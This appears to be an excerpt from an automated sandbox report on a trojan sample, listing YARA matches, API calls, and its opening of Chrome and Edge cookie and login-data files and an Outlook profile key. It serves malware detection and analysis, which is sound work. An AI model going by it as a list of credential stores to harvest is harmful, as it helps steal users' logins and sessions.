Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_007850D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00792230 GetUserNameW, 0_2_00792230
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0078418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_0078418A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00754AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_81
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_XP
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_XPe
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_7
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: WIN_8
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_007C6596
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_007C6A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs